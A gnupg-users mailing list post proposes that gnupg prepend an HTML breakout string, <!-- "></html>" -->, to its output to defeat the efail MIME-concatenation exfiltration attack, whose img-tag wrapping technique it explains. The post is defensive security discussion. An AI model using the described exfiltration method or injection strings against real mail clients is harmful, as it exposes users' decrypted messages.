It struck me at lunch that it might be possible for gnupg itself to scupper the MIME concatenation (direct exfiltration) technique mentioned in efail, and thereby plug the leaks in multiple vulnerable clients at once. This would however require it to be naughty with its output.
MIME concatenation works because in many clients the individual MIME parts of a message are not kept isolated from each other after they are passed to the rendering engine. Instead, they are concatenated together into a single document, perhaps with some separator such as an hline. This is dangerous because an HTML parser will interpret that document as a single unit, breaking all sorts of same-origin hygiene. The primary technique for exfiltration is to wrap the target document in an active HTML tag such as <img href="....">. But HTML requires the quoted string to be safe, and there is no way for the efail attack to perform input sanitation on the target document before the HTML parser gets its hands on it. Bear with me, because this is *not* a fully thought-out plan, merely an idea. ;-) So gnupg could (under circumstances likely to prevail inside a mail client) prefix and/or suffix its output with an HTML content-injection string specially designed to break out of whatever active element the efail attack might be using. It could be as simple as prefacing the output document with the perfectly valid HTML tag: <!-- "></html>" --> If this were parsed by an HTML display engine in the normal manner, it would have negligible effect. But enclosed in a tag property, the first set of quotes+angle would exit the tag safely, and then the </html> would cause an early end to the document, with luck causing a fatal validation error, or preventing any content that came after it from being accessible via the DOM. I see a couple of problems with this. Firstly, it may not be possible to tailor a single content-injection tool that would be effective against all attacks and in all HTML engines, although And secondly, gnupg will probably not be able to tell on its own whether it has been called from an MUA context. But setting an environment variable such as GNUPG_HTML_COUNTERMEASURES=true would certainly be sufficient, providing both users and MUA developers a convenient big red switch that can just be enabled. -- Andrew Gallagher
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
